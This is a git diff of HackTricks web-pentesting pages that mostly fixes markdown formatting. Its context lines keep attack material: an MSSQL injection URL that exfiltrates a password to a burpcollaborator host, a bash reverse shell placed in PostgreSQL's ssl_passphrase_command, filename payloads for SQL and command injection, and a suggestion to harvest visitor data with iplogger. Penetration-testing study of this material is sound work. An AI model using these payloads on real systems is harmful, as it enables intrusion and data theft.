Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/pentesting-web/file-upload.md b/pentesting-web/file-upload.md index cbd6e83b..1216560c 100644 --- a/pentesting-web/file-upload.md +++ b/pentesting-web/file-upload.md @@ -45,7 +45,7 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**. -**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider)\*\*\*\* +**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider) ### **wget File Upload/SSRF Trick** @@ -83,10 +83,10 @@ Note that **another option** you may be thinking of to bypass this check is to m * Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection** * Set **filename** to `` to achieve a XSS * Set **filename** to `; sleep 10;` to test some command injection \(more [command injections tricks here](command-injection.md)\) -* \*\*\*\*[**XSS** in image \(svg\) file upload](xss-cross-site-scripting/#xss-uploading-files-svg) +* [**XSS** in image \(svg\) file upload](xss-cross-site-scripting/#xss-uploading-files-svg) * **JS** file **upload** + **XSS** = [**Service Workers** exploitation](xss-cross-site-scripting/#xss-abusing-service-workers) -* \*\*\*\*[**XXE in svg upload**](xxe-xee-xml-external-entity.md#svg-file-upload)\*\*\*\* -* \*\*\*\*[**Open Redirect** via uploading svg file](open-redirect.md#open-redirect-uploading-svg-files) +* [**XXE in svg upload**](xxe-xee-xml-external-entity.md#svg-file-upload) +* [**Open Redirect** via uploading svg file](open-redirect.md#open-redirect-uploading-svg-files) * [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/) * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index f339e7aa..9a55efb6 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -53,7 +53,7 @@ Other useful extensions: 5. Add **another layer of extensions** to the previous check: * _file.png.jpg.php_ * _file.php%00.png%00.jpg_ -6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. **\*\*(useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php\*\* will execute code): +6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code): * _ex: file.php.png_ 7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”) 8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php @@ -148,7 +148,7 @@ Note that **another option** you may be thinking of to bypass this check is to m * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. -* Upload the **\*\*\[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\* +* Upload the \[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus** * Check if there is any **size limit** uploading files Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): @@ -195,7 +195,7 @@ The decompressed files will be created in unexpected folders. One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application. -An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)\*\*\*\* +An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc) ```python python2 evilarc.py -h diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index 0a103d4e..f16e0d1c 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -5,7 +5,7 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet. {% hint style="danger" %} -Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. +Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. {% endhint %} ## Hyperlink diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md index 43373173..24bd9e38 100644 --- a/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/pentesting-web/hacking-jwt-json-web-tokens.md @@ -44,7 +44,7 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a ## Brute-force HMAC secret -****[**See this page.**](../brute-force.md#jwt)**** +[**See this page.**](../brute-force.md#jwt) ## Modify the algorithm to None (CVE-2015-9235) diff --git a/pentesting-web/hacking-with-cookies/cookie-tossing.md b/pentesting-web/hacking-with-cookies/cookie-tossing.md index 4ef713f9..f9565f3e 100644 --- a/pentesting-web/hacking-with-cookies/cookie-tossing.md +++ b/pentesting-web/hacking-with-cookies/cookie-tossing.md @@ -57,6 +57,6 @@ A Cookie Tossin attack may be used also to perform **Cookie Bomb** attack: ### References -* ****[**@blueminimal**](https://twitter.com/blueminimal)**** -* ****[**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers)**** -* ****[**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/)**** +* [**@blueminimal**](https://twitter.com/blueminimal) +* [**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers) +* [**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/) diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md index 7e61800b..8a039d86 100644 --- a/pentesting-web/http-response-smuggling-desync.md +++ b/pentesting-web/http-response-smuggling-desync.md @@ -34,7 +34,7 @@ Apart from being able to **distribute more easily tens of exploits** across legi ### Exploit Organisation -As explained previously, in order to abuse this technique, it's needed that the **first smuggled message** into the server **requires a lot of time to be processed**. +As explained previously, in order to abuse this technique, it's needed that the **first smuggled message** into the server **requires a lot of time to be processed**. This **time consuming request is enough** if we just want to **try to steal the victims response.** But if you want to perform a more complex exploit this will be a common structure for the exploit. diff --git a/pentesting-web/idor.md b/pentesting-web/idor.md index ae4a3b01..33b175b8 100644 --- a/pentesting-web/idor.md +++ b/pentesting-web/idor.md @@ -1,6 +1,6 @@ # IDOR -**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**** +**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) ## Unsuspected places to look for IDORs diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md index 18f446df..844dc9e5 100644 --- a/pentesting-web/oauth-to-account-takeover.md +++ b/pentesting-web/oauth-to-account-takeover.md @@ -2,11 +2,11 @@ ## Basic Information -There are a couple different versions of OAuth, you can read [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. +There are a couple different versions of OAuth, you can read [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. In this article, we will be focusing on the most common flow that you will come across today, which is the [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/). In essence, OAuth provides developers an **authorization mechanism to allow an application to access data or perform certain actions against your account, from another application** (the authorization server). -For example, let’s say website _**https://yourtweetreader.com**_ has functionality to **display all tweets you’ve ever sent**, including private tweets. In order to do this, OAuth 2.0 is introduced. _https://yourtweetreader.com_ will ask you to **authorize their Twitter application to access all your Tweets**. A consent page will pop up on _https://twitter.com_ displaying what **permissions are being requested**, and who the developer requesting it is. Once you authorize the request, _https://yourtweetreader.com_ will be **able to access to your Tweets on behalf of you**. +For example, let’s say website _**https://yourtweetreader.com**_ has functionality to **display all tweets you’ve ever sent**, including private tweets. In order to do this, OAuth 2.0 is introduced. _https://yourtweetreader.com_ will ask you to **authorize their Twitter application to access all your Tweets**. A consent page will pop up on _https://twitter.com_ displaying what **permissions are being requested**, and who the developer requesting it is. Once you authorize the request, _https://yourtweetreader.com_ will be **able to access to your Tweets on behalf of you**. Elements which are important to understand in an OAuth 2.0 context: @@ -243,5 +243,5 @@ If the platform you are testing is an OAuth provider [**read this to test for po ## References -* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)**** -* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)**** +* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1) +* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors) diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index 3b0a386d..fe5475ec 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md @@ -1,6 +1,6 @@ # Parameter Pollution -**Copied from** [**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)**** +**Copied from** [**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) **Summary :** diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md index b4943118..feb485e8 100644 --- a/pentesting-web/race-condition.md +++ b/pentesting-web/race-condition.md @@ -74,7 +74,7 @@ The **problem** appears when you **accept it** and automatically sends a **`aut #### Race Condition in `Refresh Token` -Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.** +Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.** ## References diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md index 05498abc..6a8f84a7 100644 --- a/pentesting-web/registration-vulnerabilities.md +++ b/pentesting-web/registration-vulnerabilities.md @@ -25,7 +25,7 @@ In that case you may try to bruteforce credentials. ### SQL Injection -****[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms. +[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms. ### Oauth Takeovers diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md index a6ff47e3..8acd98c6 100644 --- a/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/pentesting-web/regular-expression-denial-of-service-redos.md @@ -2,7 +2,7 @@ ## Introduction -**Copied from** [**https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS)**** +**Copied from** [**https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS) The **Regular expression Denial of Service (ReDoS)** is a [Denial of Service](https://owasp.org/www-community/attacks/Denial\_of\_Service) attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time. diff --git a/pentesting-web/reverse-tab-nabbing.md b/pentesting-web/reverse-tab-nabbing.md index b587feb2..7b64f3d6 100644 --- a/pentesting-web/reverse-tab-nabbing.md +++ b/pentesting-web/reverse-tab-nabbing.md @@ -86,4 +86,4 @@ Prevention information are documented into the [HTML5 Cheat Sheet](https://cheat {% embed url="https://owasp.org/www-community/attacks/Reverse_Tabnabbing" %} -**** + diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md index ef085c3c..3e008b9d 100644 --- a/pentesting-web/sql-injection/README.md +++ b/pentesting-web/sql-injection/README.md @@ -246,7 +246,7 @@ In this case there **isn't** any way to **distinguish** the **response** of the You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay. -**Oracle** doesn't support **stacked queries.** MySQL\*\*,\*\* Microsoft **and** PostgreSQL support\*\* them: `QUERY-1-HERE; QUERY-2-HERE` +**Oracle** doesn't support **stacked queries.** MySQL**,** Microsoft **and** PostgreSQL support** them: `QUERY-1-HERE; QUERY-2-HERE` ## Out of band Exploitation diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md index 5de2f822..f619746d 100644 --- a/pentesting-web/sql-injection/mssql-injection.md +++ b/pentesting-web/sql-injection/mssql-injection.md @@ -42,7 +42,7 @@ https://vuln.app/getItem?id=1'%2buser_name(@@version)-- #### fn\_trace\_gettabe, fn\_xe\_file\_target\_read\_file, fn\_get\_audit\_file (from [here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)) - `fn_xe_file_target_read_file()` example: +`fn_xe_file_target_read_file()` example: ``` https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)) @@ -74,9 +74,9 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2 -**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)**** +**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL) -****[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). +[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). One technique that keeps coming up is the usage of the undocumented stored procedure `xp_dirtree` that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests. diff --git a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md index d67c9ae1..297732e8 100644 --- a/pentesting-web/sql-injection/mysql-injection/README.md +++ b/pentesting-web/sql-injection/mysql-injection/README.md @@ -1,6 +1,6 @@ # MySQL injection -**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)**** +**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) ## Comments @@ -85,7 +85,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges * `SELECT LEFT(version(),1...lenght(version()))='asd'...` * `SELECT INSTR('foobarbar', 'fo...')=1` -## Detect number of columns +## Detect number of columns Using a simple ORDER diff --git a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md index 38be1c25..a03dc491 100644 --- a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md +++ b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md @@ -1,6 +1,6 @@ # Mysql SSRF -**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)**** +**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona) ### Using LOAD\_FILE/LOAD DATA/LOAD XML diff --git a/pentesting-web/sql-injection/oracle-injection.md b/pentesting-web/sql-injection/oracle-injection.md index bf95b6e6..6b6bb833 100644 --- a/pentesting-web/sql-injection/oracle-injection.md +++ b/pentesting-web/sql-injection/oracle-injection.md @@ -2,7 +2,7 @@ ## SSRF -**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle)**** +**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle) Using Oracle to do Out of Band HTTP and DNS requests is well documented but as a means of exfiltrating SQL data in injections. We can always modify these techniques/functions to do other SSRF/XSPA. diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index 812df601..e64c8337 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md @@ -1,21 +1,21 @@ # PostgreSQL injection -**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)\*\*\*\* +**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) ## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration **`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**.\ **These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**.\ -[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)\*\*\*\* +[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md) ### **Exfiltration example using dblink and large objects** -You can [**read this example**](dblink-lo\_import-data-exfiltration.md) **\*\*to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`. +You can [**read this example**](dblink-lo\_import-data-exfiltration.md) to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`. ## PL/pgSQL password bruteforce PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.\ -**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md)\*\*\*\* +**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md) ## File-system actions @@ -40,7 +40,7 @@ A very important limitation of this technique is that **`copy` cannot be used to ### **Binary files upload** However, there are **other techniques to upload big binary files**.\ -[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md)\*\*\*\* +[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md) ## RCE @@ -67,7 +67,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol ### RCE with PostgreSQL extensions Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.\ -[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md)\*\*\*\* +[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md) ### PostgreSQL configuration file RCE @@ -86,7 +86,7 @@ Then, an attacker will need to: 1. **Dump private key** from the server 2. **Encrypt** downloaded private key: 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` -3. **Overwrite** +3. **Overwrite** 4. **Dump** the current postgresql **configuration** 5. **Overwrite** the **configuration** with the mentioned attributes configuration: 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` diff --git a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md index 1c04f56a..4d6b551c 100644 --- a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md +++ b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md @@ -26,7 +26,7 @@ When exploiting this remember that you have to send **chunks of 2KB clear-text b Also, debugging the process you can see the contents of the large objects created with: ```sql - select loid, pageno, encode(data, 'escape') from pg_largeobject; + select loid, pageno, encode(data, 'escape') from pg_largeobject; ``` ## Using lo\_creat & Base64 @@ -83,7 +83,7 @@ update pg_largeobject set data=decode('', 'hex') where loid=173454 and page update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=3; ``` -The HEX must be just the hex (without `0x` or `\x`), example: +The HEX must be just the hex (without `0x` or `\x`), example: ```sql update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0; @@ -92,7 +92,7 @@ update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and Finally, export the data to a file and delete the large object: ```sql - select lo_export(173454, 'C:\\path\to\pg_extension.dll'); + select lo_export(173454, 'C:\\path\to\pg_extension.dll'); select lo_unlink(173454); -- deletes large object with OID 173454 ``` diff --git a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md index bf9d1c0e..4d86c68d 100644 --- a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md +++ b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md @@ -4,7 +4,7 @@ ## **Preparing the exfiltration server/**Asynchronous SQL Injection -**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)**** +**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md) Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously. diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index a97e196f..348591a8 100644 --- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -6,7 +6,7 @@ PostgreSQL is designed to be easily extensible. For this reason, extensions load Extensions are modules that supply extra functions, operators, or types. They are libraries written in C.\ From PostgreSQL > 8.1 the extension libraries must be compiled with a especial header or PostgreSQL will refuse to execute them. -Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)**** +Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md) ### RCE in Linux diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md index ab72b2a5..72a19dd7 100644 --- a/pentesting-web/sql-injection/sqlmap/README.md +++ b/pentesting-web/sql-injection/sqlmap/README.md @@ -135,7 +135,7 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs ``` -****[**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** +[**Read this post** 